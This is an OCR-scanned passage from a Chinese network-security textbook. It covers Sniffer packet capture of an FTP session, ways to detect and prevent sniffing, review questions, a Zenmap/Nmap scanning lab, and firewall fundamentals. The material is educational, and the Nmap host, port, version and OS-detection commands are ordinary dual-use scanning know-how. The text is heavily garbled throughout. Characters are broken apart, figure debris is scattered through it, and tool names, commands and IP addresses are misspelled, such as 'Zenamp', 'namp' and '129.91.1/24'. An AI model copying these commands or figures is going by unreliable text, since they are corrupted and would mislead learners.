捕获 可 以 看 到 的 所 有 数据 包 , 然 后 用 过 滤器 选择 你 感 兴趣 的 部 分 。 

第 一 种 方式 的 操作 方法 : 在 主 界面 依次 选择 File| Select Settings, 选 择 对 应 的 网 卡 , 界 
面 如 图 3-14 所 示 ; 在 主 界面 依次 选择 Capture| Select Settings | 
Define Filter, 出现 如 图 3-15 所 示 窗 口 ,可 在 其 中 Ee ee dls 
进行 相关 设置 。 在 此 窗口 有 5 个 选项 卡 ,可 分 别 elie MTL81397610s Taaiaz 
对 过 滤 规 则 中 相关 的 “地 址 “协议 ”缓存 ”文件 





家 的 全 疝 和 









天 下 
进行 设置 。 在 捕获 FTP 数据 包 时 ,FTP 服务 器 ”|aossssagl 国 

的 地 址 是 219. 246. 5. 126, 使 用 协议 是 TCP 中 的 |code 

FTP, 捕 获 到 的 数据 包 缓存 的 位 置 和 缓存 区 的 大 

小 依据 情况 进行 设置 。 图 3-14 选择 监听 的 网 卡 


Define Filter 


Summary | Address | Data Pattern | Advanced | Buffer | 





Yew Profile Nane: 
Cancel 


他 Copy Existing Profile: 
[Default 了 


Brofile: 


(a e Profile: 
A opy Sanple Profile 
prle Telk = 
Renane 





确定 | 取消 | Geotiles .| > 一 一 点击 文件 


图 3-15 设置 数据 包 分 析 文 件 保 存 的 位 置 
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首先 可 选 定数 据 包 分 析 文 件 保 存 的 位 置 ,并 将 其 命名 为 FTP, 具 体 方法 是 : 在 Sniffer 
运行 界面 中 , 先 单 击 菜单 栏 中 的 Profile| New 新 建文 件 ,并 输入 文件 名 字 , 单 击 OK 按钮 就 
可 完成 。 当 然 , 也 可 以 直接 使 用 Default 的 默认 设置 。 

下 一 步 ,在 打开 的 Define Filter 窗口 中 ,选择 Address 选项 卡 , 在 这 里 可 进行 最 常用 的 
过 滤 规 则 定义 ,其 中 包括 MAC 地 址 ,IP 地 址 和 IPX 地 址 的 定义 ,如 图 3-16 所 示 。 








Summary Adiress |Data Pattern | Mdvanced| Buffer | 
Address: Dragable) 


由 明 Broadcastymulticast Address 
只 hairess Book 





2192465126 























图 3-16 设置 依据 IP 地 址 的 过 滤 规 则 


在 打开 的 Define Filter 窗口 中 ,选择 Advanced 选项 卡 , 在 这 里 可 以 定义 希望 捕获 何 种 
协议 的 数据 包 ; 选择 Buffer 选项 卡 ,在 此 界面 可 定义 捕获 到 的 数据 包 存 放 地 方 以 及 缓冲 区 
的 大 小 。 

(3) 应 用 过 滤 规 则 ,开始 抓 包 。 在 Sniffer 运行 界面 中 , 单 击 菜单 栏 上 的 Capture| Select 
Filter, 在 出 现 的 窗口 中 选择 刚刚 设置 好 的 过 滤 规 则 。 然 后 通过 单 击 Capture| Start 或 者 单 
击 工具 栏 上 的 三 角 箭 头 , 表 示 开 始 抓 包 。 当 要 停止 捕获 时 ,同样 可 以 有 两 种 方式 , 单 击 工具 
栏 上 的 停止 按钮 ,也 可 以 选择 Capture 中 的 相应 选项 。 抓 包 结 果 如 图 3-17 所 示 。 
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图 3-17 抓 包 结果 
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(4) 协议 分 析 。 在 停止 抓 包 的 时 候 , 出 现 如 图 3-17 所 示 的 界面 后 , 单 击 Decode 后 ,出 
现 捕 获 到 的 数据 包 。 因 为 FTP 协议 工作 的 过 程 需要 传输 层 TCP 协议 的 支持 ,所 以 首先 要 
通过 TCP 的 3 次 握手 建立 连接 , 才 可 以 进行 数据 交换 。 如 图 3-18 所 示 的 信息 ,清楚 地 表示 
了 FTP 连接 建立 的 过 程 。 


[Status [Sowce Adhess 














wm 





人 


图 3-18 协议 分 析 


第 一 个 数据 包 : 源 端 1619 向 目的 端的 21(FTP 默认 端口 ) 端 口 发 送 数 据 , 标 志 位 为 
SYN 表示 同步 ,'SEQ=369724012 表示 IP 为 219. 246. 5. 110 的 主机 随机 选择 的 一 个 数据 包 
序号 。 

第 二 个 数据 包 : 源 端 21 向 目的 端的 1619 号 端口 发 送 回 执 号 为 369724013 来 发 送 回 执 
对 话 , 这 个 序号 比 上 个 数据 包 的 SEQ 号 大 1, 同 时 服务 器 端 自己 产生 一 个 随机 选择 的 序号 
814426062 来 识别 这 次 会 话 。 

第 三 个 数据 包 : 3 次 握手 的 最 后 一 个 帧 。 工 作 站 会 发 送 一 个 回执 数据 包 (ACK = 
814426063) ,确认 收 到 来 自 服务 器 上 的 帧 。 这 样 就 成 功 建立 了 会 话 。 两 者 可 以 互通 信息 。 


3.4.3 网 络 监听 防范 


网 络 监听 很 难 被 发 现 , 因 为 运行 网 络 监听 的 主机 只 是 被 动 地 接收 在 局 域 网 上 传输 的 信 
息 ,不 会 主动 与 其 他 主机 交换 信息 ,也 没有 修改 在 网 上 传输 的 数据 包 。 攻 击 者 会 出 卖 利 用 网 
络 监听 工具 得 到 的 某 些 重要 信息 ,或 者 根据 监听 到 的 信息 来 决定 下 一 步 采取 什么 样 的 行动 。 
这 样 ,就 会 使 企业 或 用 户 蒙受 巨大 的 损失 。 所 以 ,网 络 监 听 的 检测 与 防范 在 网 络 安全 中 也 是 
不 可 忽视 的 。 

1. 检测 网 络 监听 的 方法 

检测 单独 一 台 主 机 是 否 正在 被 监听 ,相对 来 说 是 比较 简单 的 。 可 以 通过 查看 系统 进程 ， 
或 者 通过 检查 网 络 接口 卡 的 工作 模式 是 否 为 混杂 模式 来 决定 是 否 已 经 被 监听 。 而 对 于 整个 
网 络 来 说 ,检测 就 要 复杂 得 多 。 下 面 介绍 几 种 检测 网 络 监听 的 方法 。 

(1) 对 于 怀疑 运行 监听 程序 的 机 器 ,用 正确 的 IP 地 址 和 错误 的 物理 地 址 进行 ping 操 
作 , 运 行 监听 程序 的 机 器 通常 会 有 响应 。 这 是 因为 正常 的 机 器 不 接收 错误 的 物理 地 址 ,而 处 
于 监听 状态 的 机 器 能 够 接收 。 

(2) 向 网 上 发 送 大 量 的 不 存在 的 物理 地 址 的 包 , 由 于 监听 程序 要 分 析 和 处 理 大 量 的 数 
据 包 ,所 以 会 占用 很 多 的 CPU 资源 ,这 将 导致 性 能 下 降 。 通 过 比较 该 机 器 前 后 的 性 能 加 以 
判断 。 但 这 种 方法 操作 难度 比较 大 ,判断 也 较为 困难 。 

(3) 可 以 使 用 反 监 听 工 具 如 antisniffer 等 进行 检测 。 

(4) 检查 网 络 接口 卡 是 否 为 混杂 模式 (PROMISC) 。 要 想 监 听 整 个 网 络 中 报 文 , 需 将 网 
卡 工作 方式 设 为 混杂 模式 。 检 查 网 卡 是 否 工作 在 混杂 模式 的 方法 如 下 : 

在 Linux 系统 中 ,以 根 用 户 root 权限 进入 字符 终端 ,在 提示 符 下 输入 “ifconfig - a”, 可 
显示 系统 中 所 有 接口 卡 的 详细 信息 。 检 查 每 一 个 接口 所 显示 的 信息 , 当 发 现 某 一 个 接口 信 
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息 中 出 现 了 PROMISC 标志 ,就 说 明 这 个 接口 卡 已 经 工作 在 混杂 模式 下 了 。 

在 Windows 系统 下 检查 网 卡 的 工作 模式 , 需 使 用 第 三 方 软件 来 检测 网 卡 的 工作 模式 。 
如 PromiScan 软件 。 但 有 些 监 听 器 会 将 表示 网 卡 混杂 模式 的 字符 PROMISC 隐藏 起 来 ,以 
躲避 上 述 这 种 检测 方式 。 这 样 ,就 必须 使 用 其 他 方法 来 检测 网 络 中 是 否 有 网 络 监听 器 在 运 
行 于 5 

(5) 监视 DNS Reverse Lookup。 一 些 监听 器 在 收 到 一 个 网 络 请 求 时 ,就 会 执行 DNS 
反 向 查询 ( 即 IP 地 址 到 域名 的 查询 ) , 试 着 将 IP 地 址 解释 为 主机 名 。 因 此 , 若 在 网 络 中 执行 
一 个 Ping 扫描 或 者 Ping 一 个 不 存在 的 IP 地 址 ,就 会 触发 这 种 活动 。 如 果 得 到 回答 ,就 说 
明 网 络 中 安装 有 网 络 监听 器 ; 如 果 没 有 收 到 任何 回答 ,表明 没有 监听 器 在 运行 。 

(6) 发 送 一 个 带 有 网 络 中 不 存在 的 MAC 地 址 的 广播 包 到 网 络 中 的 所 有 主机 。 正 常情 
况 下 ,网络 中 的 主机 接口 卡 在 收 到 带 有 不 存在 的 MAC 地 址 的 数据 包 时 ,会 将 它 丢 弃 , 而 当 
某 台 主机 中 的 网 络 接口 卡 处 于 混杂 模式 时 , 它 就 会 回答 一 个 带 有 RST 标志 的 包 。 这 样 ,就 
可 以 认为 网 络 中 已 经 有 监听 器 在 运行 。 注 意 ,在 交换 网 络 环境 当中 ,由 于 交换 机 在 转发 
广播 包 时 不 需要 MAC 地 址 ,所 以 也 有 可 能 做 出 与 上 述 相同 的 响应 ,应 根据 实际 情况 来 
决定 。 

(7) 监控 网 络 中 各 种 交换 机 和 路 由 器 的 运行 情况 ,来 及 时 发 现 这 些 网 络 设备 出 现 的 某 
种 不 正常 的 现象 。 比 如 有 些 本 来 关闭 了 的 端口 又 被 启用 ,而 某 些 端口 连接 的 主机 在 运行 却 
没有 流量 时 ,就 要 重新 登录 交换 机 或 路 由 器 ,仔细 查看 它 现在 的 系统 设置 和 端口 设置 情况 ， 
并 和 之 前 的 记录 对 比 , 以 此 来 发 现 交换 机 或 路 由 器 是 否 已 经 被 人 侵 。 

(8) 监视 网 络 中 的 主机 ,经 常 查看 主机 中 的 硬盘 空间 是 否 增长 过 快 ,CPU 资源 是 否 消 
耗 过 多 ,系统 响应 速度 是 否 变 慢 ,以 及 系统 是 否 经 常 莫名 其 妙 地 断 网 等 。 

2. 网 络 监听 的 防范 措施 

(1) 从 逮 辑 或 物理 上 对 网 络 分 段 。 网 络 分 段 通常 被 认为 是 控制 网 络 广播 风暴 的 一 种 基 
本 手段 ,但 其 实 也 是 保证 网 络 安全 的 一 项 措施 。 其 目的 是 将 非法 用 户 与 敏感 的 网 络 资源 相 
互 隔离 ,从 而 防止 可 能 的 非法 监听 。 

(2) 以 交换 式 集线器 代替 共享 式 集线器 。 对 局 域 网 的 中 心 交换 机 进行 网 络 分 段 后 ,局 
域 网 监听 的 危险 仍然 存在 。 这 是 因为 网 络 终端 用 户 的 接 入 往往 是 通过 分 支 集线器 而 不 是 中 
心 交换 机 ,而 使 用 最 广泛 的 分 支 集 线 器 通常 是 共享 式 集线器 。 这 样 , 当 用 户 与 主机 进行 数据 
通信 时 ,两 台 机 器 之 间 的 数据 包 ( 称 为 单 播 包 ,Unicast Packet) 还 是 会 被 同一 台 集 线 器 上 的 
其 他 用 户 所 监听 。 因 此 ,应 该 以 交换 式 集线器 代替 共享 式 集线器 ,使 单 播 包 仅 在 两 个 节点 之 
间 传 送 ,从 而 防止 非法 监听 。 当 然 ,交换 式 集线器 只 能 控制 单 播 包 而 无 法 控制 广播 包 
(Broadcast Packet) 和 多 播 包 (Multicast Packet) 。 

(3) 使 用 加 密 技术 。 数 据 经 过 加 密 后 ,通过 监听 仍然 可 以 得 到 传送 的 信息 ,但 显示 的 是 
乱码 。 使 用 加 密 技术 的 缺点 是 影响 数据 传输 速度 以 及 使 用 一 个 弱 加 密 术 比较 容易 被 攻破 。 
系统 管理 员 和 用 户 需 要 在 网 络 速度 和 安全 性 上 进行 折 中 选择 。 由 于 网 络 监 听 属 于 被 动 地 窃 
取 , 通 过 数据 加 密 技 术 , 是 最 好 的 防范 监听 的 手段 。 

(4) 划分 VLAN。 运 用 VLAN( 虚 拟 局 域 网 ) 技 术 , 将 以 太 网 通信 变 为 点 到 点 通信 ,可 
以 防止 大 部 分 基于 网 络 监听 的 入 侵 。 
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3.1 网 络 攻击 概述 

1. 网 络 攻击 是 ( Ye 
2. 网 络 系统 的 防御 技术 主要 包括 哪 几 种 技术 ? 
3. 攻击 类 型 分 为 ( yt yk je sé js 
4. 信息 收集 型 攻击 主要 包括 哪些 ? 
5. 简 述 网 络 攻击 的 8 个 步骤 。 

3.2 常见 网 络 攻防 方法 

1. 什么 是 口令 入 侵 方法 ?对 它 的 主要 防范 方法 有 哪些 ? 
2. 简 述 网 络 安全 扫描 技术 的 基本 原理 。 
3. 简 述 拒绝 服务 DoS 攻击 的 基本 原理 以 及 防范 方法 。 
4. 简 述 DDoS 攻击 的 基本 原理 。 

5. 什么 是 缓存 区 溢出 攻击 ? 

6. 简 述 欺骗 攻击 及 其 他 的 防范 方法 。 
3.3 网 络 安全 扫描 

1. 漏洞 的 3 个 主要 特性 为 ( yak ys 大 

2. 漏洞 产生 的 原因 主要 有 哪些 ? 

3. 漏洞 主要 分 为 哪 几 类 ? 它 有 哪些 等 级 ? 

4. Windows 系统 常见 漏洞 有 哪些 ? 

5. 常见 的 安全 扫描 检测 技术 主要 有 哪些 ? 

6. 端口 扫描 的 防范 措施 主要 有 哪些 ? 

3.4 网 络 监听 

1. 网 络 监听 可 能 造成 的 危害 包括 ( js ) yk Fs 
2. 简 述 网 络 监听 的 原理 。 

3. 检测 网 络 监听 的 方法 有 哪些 ? 

4. 简 述 网 监听 的 主要 防范 措施 。 


实验 3 ”Zenamp 网 络 安全 扫描 


【实验 目的 】 


了 解 网 络 安全 扫描 目的 ,理解 网 络 安全 扫描 原理 ,掌握 网 络 安全 扫描 工具 Zenamp 的 使 
用 方法 ,学 会 分 析 扫 描 结果 。 


【实验 内 容 和 要 求 】 
(1) 安装 Zenamp 软件 。Zenamp( 端 口 扫描 器 ) 是 一 个 开放 源 代 码 的 网 络 探测 和 安全 
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审核 的 工具 。 它 是 Namp 安全 扫描 工具 的 图 形 界面 前 端 , 它 可 以 支持 跨 平台 。 使 用 
Zenamp 工具 可 以 快速 地 扫描 大 型 网 络 或 单个 主机 的 信息 。 其 基本 功能 有 3 个 : 一 是 探 
测 一 组 主机 是 否 在 线 ; 二 是 扫描 主机 端口 , 嗅 探 所 提供 的 网 络 服 务 ; 三 是 推断 主机 所 用 
的 操作 系统 。 

从 Nmap 的 官网 下 载 Nmap 7.5, 安 装 完成 后 就 可 使 用 Zenamp。 

(2) 局 域 网 主机 发 现 。 

列表 扫描 命令 : 

Zenamp ”局域网 地 址 

扫描 结果 如 图 3-19 所 示 。 进 一 步 选择 图 3-19 的 “拓扑 ”选项 卡 可 直观 表示 网 络 拓扑 结 
构 为 图 3-20。 图 3-20 表明 : 实验 局 域 网 中 有 10 台 运 行 的 主机 ,IP 地 址 对 应 的 圆 的 大 小 表 
示 主 机 打开 的 端口 数 , 圆 面积 越 大 表示 该 主机 打开 的 端口 数 越 多 。 网 络 攻防 的 重点 是 打开 
端口 数 多 的 主机 ,如 图 中 的 129. 9. 1. 105、129. 9.1. 102 主机 。 
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| nmap 129.91.1/24 




















MNmap scan report for 129.9.1.192 
Host is up (9.612s latency). 
Not shown: ports 
STATE SERVICE 

135/tcp rpc 
netbios-ssn 
https 
129.9.1.102 microsoft-ds 


iss-realsecure 
129.9.1104 open 
49152/tcp open 
129.9.1105 | 49153/tcp open 
1299.1130 | 49154/tcp open 
49155/tcp open 
1299.1133 | 49156/tcp open unknown 
MAC hddress: 4C:CC:6A:A3:F1:E8 (Micro-star Int1) 
129.9.1170 


Nmap scan report for 129.9.1.105 
1299.1254 | Host is up (98.813s latency). 

Not si rts 
PORT 


139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 

49153/tcp open 
49154/tcp open 
49155/tcp open 
49168/tcp open unknown 
MAC : 4C:CC:6A:A1:CB:57 (Micro-star Int1) 


Nmap scan report for 129.9.1.139 
Host is up (9.923s latency). 
Not s! iltered ports 


5959/tcp open X11:59 
NMAC Address: 4C:6B:58:A4:8D:68 (Chicony 


Electronics) 




















3-19 ”扫描 结果 一 一 Nmap 输出 


(3) 扫描 目标 主机 端口 。 
扫描 目标 主机 端口 命令 : 


namp 一 目标 主机 IP 地 址 或 名 称 
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图 3-20 ”扫描 结果 一 一 拓扑 
结果 截图 : 开放 端口 : 结果 分 析 : 


(4) 服务 和 版 本 检测 。 
目标 主机 服务 和 版 本 检测 命令 : 


namp 一 sV 目标 主机 IP 地 址 或 名 称 
结果 截图 : ”0S 版 本 : ”结果 分 析 : 
(5) 操作 系统 检测 

目标 主机 操作 系统 检测 命令 : 


namp- 0 目标 主机 IP 地 址 或 名 称 
结果 截图 : ”结果 分 析 : 








第 4 章 ”防火墙 与 人 侵 防 御 


本 章 学 习 要 求 

掌握 防火 墙 的 功能 、 防 得 体系 结构 防火墙 工 作 原理 ; 

掌握 防火 墙 安全 策略 、 入 侵 防 御 、 内 容 过 滤 、 内 网 管控 与 安全 隔离 配置 方法 ; 
掌握 入 侵 检 测 过 程 和 入 侵 检测 方法 、 入 侵 检测 工作 原理 ; 

掌握 入 侵 防 御 系 统 工作 原理 、 蜜 钠 技 术 。 


ee 8 + 


4.1 防火 墙 基础 


通过 Internet, 企 业 可 以 从 异地 取 回 重要 数据 ,同时 又 要 面 对 Internet 开放 带 来 的 数据 
安全 的 新 挑战 和 新 危险 , 即 客户 .销售 商 、 移 动用 户 . 异 地 员工 和 内 部 员工 的 安全 访问 ,以 及 
保护 企业 的 机 密 信 息 不 受 黑 客 和 工业 间谍 的 入侵 。 因 此 企业 必须 加 筑 安 全 的 "战壕 ”, 这 个 
“战壕 ”就 是 防火 墙 (Firewall) 。 

防火 墙 技术 是 建立 在 现代 通信 网 络 技 术 和 信息 安全 技术 基础 上 的 应 用 性 安全 技术 , 越 
来 越 多 地 应 用 于 专用 网 络 与 公用 网 络 的 互联 环境 之 中 ,特别 是 需要 接 入 Internet 的 网 络 。 


4.1.1 防火 墙 定 义 


1. 防火 墙 的 原理 

防火 墙 的 本 义 是 指 古 代 构 筑 和 使 用 木 制 结构 房屋 的 时 候 , 为 防止 火灾 的 发 生 和 草 延 ,人 
们 将 坚固 的 石 块 堆砌 在 房屋 周围 作为 屏障 ,这 种 防御 构筑 物 就 被 称 为 "防火墙 ?。 然 而 ,多 数 
防火 墙 里 都 有 一 个 重要 的 门 ,允许 人 们 进入 或 离开 房屋 。 因 此 ,防火墙 在 提供 增强 安全 性 的 
同时 应 允许 必要 的 访问 。 

计算 机 网 络 安全 领域 中 的 防火 墙 指 位 于 两 个 或 多 个 网 络 之 间 ,执行 访问 控制 策略 的 一 
个 或 一 组 系统 ,是 一 类 防范 措施 的 总 称 。 其 作用 是 防止 不 希望 的 .未 经 授权 的 通信 进出 被 保 
护 的 网 络 ,通过 边界 控制 强化 内 部 网 络 的 安全 政策 。 

防火 墙 放置 在 外 部 网 络 和 内 部 网 络 中 间 ,执行 网 络 边界 的 过 滤 封锁 机 制 ,如 图 4-1 
所 示 。 

防火 墙 是 一 种 隔离 控制 技术 ,在 不 同 网 域 之 间 设 置 屏障 ,阻止 对 信息 资源 的 非法 访问 ， 
对 于 来 自 Internet 的 访问 ,采取 有 选择 的 接受 方式 , 它 可 以 允许 或 禁止 一 类 具体 的 IP 地 址 
访问 ,可 以 接受 或 拒绝 TCP/IP 上 的 某 一 类 应 用 ,也 可 以 使 用 防火 墙 阻 止 重 要 信息 从 企业 的 
网 络 上 被 非法 输出 。 

2. 防火 墙 的 作用 

在 互联 网 中 防火 墙 是 一 种 非常 有 效 的 网 络 安全 设备 ,通过 它 可 以 隔离 风险 区 域 ( 即 
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DNS 


图 4-1 防火 墙 系统 模型 


Internet 或 有 一 定 风险 的 网 络 ) 与 安全 区 域 ( 即 通常 讲 的 内 部 网 络 ) 的 连接 ,同时 不 妨碍 本 地 
网 络 用 户 对 风险 区 域 的 访问 。 防 火 墙 可 以 监控 进出 网 络 的 通信 , 仅 让 安全 ,被 核准 的 信息 进 
入 ,抵制 对 本 地 网 络 安 全 构成 威胁 的 数据 。 因 此 ,防火 墙 的 作用 是 防止 不 希望 的 .未 授权 的 
通信 进出 被 保护 的 网 络 , 迫 使 用 户 强化 自己 的 网 络 安全 政策 ,简化 网 络 的 安全 管理 。 

3. 防火 墙 的 功能 

从 总 体 上 看 ,常见 的 防火 墙 应 具有 以 下 五 大 基本 功能 。 

(1) 过 滤 进 、 出 内 部 网 络 的 数据 。 

(2) 管理 进 、 出 内 部 网 络 的 访问 行为 。 

(3) 封 堵 某 些 禁止 的 业务 。 

(4) 记录 通过 防火 墙 的 信息 内 容 和 活动 。 

(5) 对 网 络 攻击 进行 检测 和 报警 。 

除 此 以 外 ,有 的 防火 墙 还 根据 需求 包括 其 他 的 功能 ,如 网 络 地 址 转换 功能 (NAT) 、 双 重 
DNS、 虚 拟 专用 网 络 (VPN) , 扫 毒 功能 、 负 载 均衡 和 计 费 等 功能 。 为 实现 以 上 功能 ,在 防火 
墙 产 品 的 开发 中 ,广泛 地 应 用 网 络 拓 扑 技术 、 计 算 机 操作 系统 技术 、 路 由 技术 、 加 密 技 术 \ 访 
问 控制 技术 以 及 安全 审计 技术 等 。 目 前 还 没有 厂商 绝对 保证 防火 墙 不 会 存在 安全 漏洞 , 因 
此 对 防火 墙 也 必须 提供 某 种 安全 保护 。 

4. 防火 墙 的 特性 

防火 墙 一 般 放 置 在 被 保护 网 络 的 边界 ,要 使 防火 墙 起 到 安全 防御 作用 ,必须 做 到 : 使 所 
有 进出 被 保护 网 络 的 通信 数据 流 必须 经 过 防火 墙 ,所 有 通过 防火 墙 的 通信 必须 经 过 安全 策 
略 的 过 滤 或 者 防火 墙 的 授权 ,另外 ,防火 墙 本 身 也 必须 是 不 可 被 侵入 的 。 

5. 防火 墙 的 优点 

(1) 防火 墙 对 企业 内 部 网 实现 了 集中 的 安全 管理 ,可 以 强化 网 络 安全 策略 ,比分 散 的 主 
机 管理 更 经 济 易 行 。 

(2) 防火 墙 能 防止 非 授权 用 户 进 入 内 部 网 络 。 

(3) 防火 墙 可 以 方便 地 监视 网 络 的 安全 性 并 报警 。 

(4) 可 以 作为 部 署 网 络 地 址 转换 的 地 点 ,利用 NAT 技术 ,可 以 缓解 地 址 空间 的 短缺 , 隐 
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藏 内 部 网 的 结构 。 

(5) 由 于 所 有 的 访问 都 经 过 防火 墙 ,防火 墙 是 审计 和 记录 网 络 访问 和 使 用 的 最 佳 地方 。 

6. 防火 墙 的 局 限 性 

通常 ,认为 防火 墙 可 以 保护 处 于 它 身后 的 内 部 网 络 不 受 外 界 的 侵袭 和 干扰 ,但 随 着 网 络 
技术 的 发 展 , 网 络 结构 日 趋 复杂 ,传统 防火 墙 在 使 用 的 过 程 中 暴露 出 以 下 弱点 : 

(1) 防火 墙 不 能 防范 不 经 过 防火 墙 的 攻击 。 没 有 经 过 防火 墙 的 数据 ,防火 墙 无 法 检查 。 
传统 的 防火 墙 在 工作 时 ,人 侵 者 可 以 伪造 数据 绕 过 防火 墙 或 者 找到 防火 墙 中 可 能 敞开 的 
后 门 。 

(2) 防火 墙 不 能 防止 来 自 网 络 内 部 的 攻击 和 安全 问题 。 

(3) 由 于 防火 墙 性 能 上 的 限制 ,因此 它 通常 不 具备 实时 监控 入 侵 行为 的 能 力 。 

(4) 防火 墙 不 能 防止 策略 配置 不 当 或 错误 配置 引起 的 安全 威胁 。 防 火 墙 是 一 个 被 动 的 
安全 策略 执行 设备 ,就 像 门卫 一 样 ,要 根据 政策 规定 来 执行 安全 ,而 不 能 自作 主张 。 

(5) 防火 墙 不 能 防止 受 病毒 感染 的 文件 的 传输 , 巾 于 病毒 种 类 繁多 ,如 果 要 在 防火 墙 完 
成 对 所 有 病毒 代码 的 检查 ,防火 墙 的 效率 就 会 降 到 不 能 忍受 的 程度 。 

(6) 防火 墙 不 能 防止 利用 服务 器 系统 和 网 络 协议 漏洞 所 进行 的 攻击 。 黑 客 通过 防火 墙 
准许 的 访问 端口 对 该 服务 器 的 漏洞 进行 攻击 ,防火 墙 不 能 防止 。 

(7) 防火 墙 不 能 防止 数据 驱动 式 的 攻击 。 当 有 些 表面 看 来 无 害 的 数据 邮寄 或 复制 到 内 
部 网 的 主机 上 并 被 执行 时 ,可 能 会 发 生 数据 驱动 式 的 攻击 。 

(8) 防火 墙 不 能 防止 内 部 的 泄密 行为 。 对 于 防火 墙 内 部 的 一 个 合法 用 户主 动 泄密 , 防 
火 墙 是 无 能 为 力 的 。 

(9) 防火 墙 不 能 防止 本 身 的 安全 漏洞 的 威胁 。 防 火 墙 保护 别人 有 时 却 无 法 保护 自己 ， 
防火 墙 本 身 必 须 具 有 很 强 的 抗 攻 击 能 力 , 以 确保 其 自身 的 安全 性 。 简 单 的 防火 墙 可 以 只 用 
路 由 器 实现 ,复杂 的 可 以 用 主机 ,专用 硬件 设备 及 软件 来 实现 。 通 常 意义 上 讲 的 硬 防火 墙 为 
硬件 防火 墙 , 它 是 通过 专用 硬件 和 专用 软件 的 结合 来 达到 隔离 内 、 外 部 网 络 的 目的 ,价格 较 
贵 ,但 效果 较 好 ,一般 小 型 企业 和 个 人 很 少 使 用 。 软 件 防 火 墙 是 通过 软件 的 方式 来 达到 , 价 
格 便宜 ,但 这 类 防火 墙 只 能 通过 一 定 的 规则 来 达到 限制 一 些 非法 用 户 访问 内 部 网 的 目的 。 
防火 墙 被 设计 为 只 运行 专用 的 访问 控制 软件 的 设备 ,而 没有 其 他 的 服务 ,因此 也 就 意味 着 相 
对 少 一 些 缺陷 和 安全 漏洞 。 此 外 ,防火 墙 也 改进 了 登录 和 监控 功能 ,从 而 可 以 进行 专用 的 
管理 。 

总 之 ,防火 墙 是 在 被 保护 网 络 和 外 部 网 络 之 间 进 行 访问 控制 的 一 个 或 者 一 组 访问 控制 
部 件 。 随 着 防火 墙 技术 的 发 展 , 防 火 墙 可 以 结合 人 侵 检 测 系统 (IDS) 使 用 ,或 者 其 本 身 集成 
IDS 功能 ,能 够 根据 实际 情况 进行 动态 的 策略 调整 ,以 达到 更 好 的 防御 效果 。 


4.1.2 防火 墙 分 类 


采用 不 同 的 划分 方式 ,可 以 将 防火 墙 划分 为 不 同 的 类 型 。 如 果 按 所 采用 的 技术 划分 ,可 
将 防火 墙 分 为 包 过 滤 防 火 墙 .代理 防火 墙 和 状态 检测 防火 墙 。 按 组 成 结构 划分 ,可 分 为 软件 
防火 墙 、 硬 件 防 火 墙 和 芯片 级 防火 墙 。 如 果 按 部 署 位 置 划分 ,防火 墙 又 分 为 边界 防火 墙 、 个 
人 防火 墙 和 混合 式 防火 墙 。 
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1. 按 所 采用 的 技术 分 类 

防火 墙 主要 采用 包 过 滤 、 代 理 和 状态 检测 技术 ,所 以 ,根据 防火 墙 采用 技术 的 不 同 , 可 将 
防火 墙 分 为 包 过 滤 防 火 墙 , 代 理 防 火 墙 和 状态 检测 防火 墙 。 每 种 防火 墙 都 有 各 自 的 优 缺点 。 

1) 包 过 滤 防 火 墙 

(1) 工作 原理 : 包 过 滤 是 第 一 代 防 火 墙 技术 。 其 技术 依据 是 网 络 中 的 分 包 传输 技术 ， 
它 工作 在 OSI 模型 的 网 络 层 。 网 络 上 的 数据 都 是 以 * 包 ?为 单位 进行 传输 的 ,数据 被 分 割 成 
为 一 定 大 小 的 数据 包 , 每 一 个 数据 包 中 都 会 包含 一 些 特定 信息 ,如 数据 的 IP 源 地 址 、IP 目 
标 地 址 .封装 协议 (TCP.UDP ICMP 等 )、TCP/UDP 源 端口 和 目标 端口 等 。 包 过 滤 防 火 墙 
又 被 称 为 访问 控制 列表 防火 墙 ,其 要 遵循 的 一 条 基本 原则 是 “最 小 特权 原则 ”, 即 明确 要 求 管 
理 员 指 定 希望 通过 的 数据 包 , 而 禁止 其 他 的 数据 包 。 

(2) 基本 思想 : 选择 路 由 的 同时 对 数据 包 进 行 检查 ,根据 定义 好 的 过 滤 规 则 审查 每 个 
数据 包 并 确定 数据 包 蚌 否 与 过 滤 规 则 匹配 ,从 而 决定 数据 包 能 否 通过 。 

(3) 包 过 滤 防 火 墙 的 优点 是 可 以 与 现 有 的 路 由 器 集成 ,也 可 以 用 独立 的 包 过 滤 软 件 实 
现 , 且 数 据 包 过 滤 对 用 户 透明 ,成 本 低 、 速 度 快 .效率 高 。 

(4) 包 过 滤 防 火 墙 的 缺点 首先 是 配置 困难 。 因 为 包 过 滤 防 火 墙 很 复杂 ,人 们 经 常会 忽 
略 建立 一 些 必 要 的 规则 ,或 者 错误 地 配置 了 已 有 的 规则 。 若 是 为 了 提高 安全 性 而 使 用 复杂 
的 过 滤 规 则 , 则 效率 极 低 。 其 次 ,由 于 防火 墙 工作 在 网 络 层 ,所 以 不 能 检测 那些 对 高 层 进行 
的 攻击 。 还 有 为 特定 服务 开放 的 端口 也 存在 危险 ,可 能 被 用 于 其 他 传输 。 最 后 ,因为 大 多 数 
包 过 滤 防 火 墙 都 是 基于 IP 包头 中 的 信息 进行 过 滤 的 ,但 IP 包 中 信息 的 可 靠 性 没有 保障 ,IP 
源 地 址 可 以 伪造 ,通过 与 内 部 合谋 ,入 侵 者 轻易 就 可 以 绕 过 防火 墙 。 

2) 代理 防火 墙 

代理 防火 墙 是 一 种 较 新 型 的 防火 墙 技 术 , 它 分 为 应 用 级 网 关 和 电路 级 网 关 。 

代理 防火 墙 的 原理 是 通过 编程 来 弄 清 用 户 应 用 层 的 流量 ,并 能 在 用 户 层 和 应 用 协议 层 
提供 访问 控制 ,而 且 可 记录 所 有 应 用 程序 的 访问 情况 。 记 录 和 控制 所 有 进出 流量 的 能 力 是 
代理 防火 墙 的 主要 优点 之 一 。 代 理 防 火 墙 一 般 是 运行 代理 服务 器 的 主机 。 

代理 服务 器 指 代表 客户 处 理 与 服务 器 连接 请 求 的 程序 。 当 代理 服务 器 接收 到 用 户 对 某 
站 点 的 访问 请 求 后 , 便 会 检查 该 请 求 是 否 符 合 规则 ,如 果 规 则 允许 用 户 访问 该 站 点 ,那么 代 
理 服务 器 会 像 一 个 客户 一 样 去 那个 站 点 取 回 所 需 信息 再 转发 给 客户 。 代 理 服务 器 通常 都 拥 
有 一 个 高 速 缓存 ,这 个 缓存 存储 着 用 户 经 常 访问 的 站 点 内 容 , 在 下 一 个 用 户 要 访问 同一 站 点 
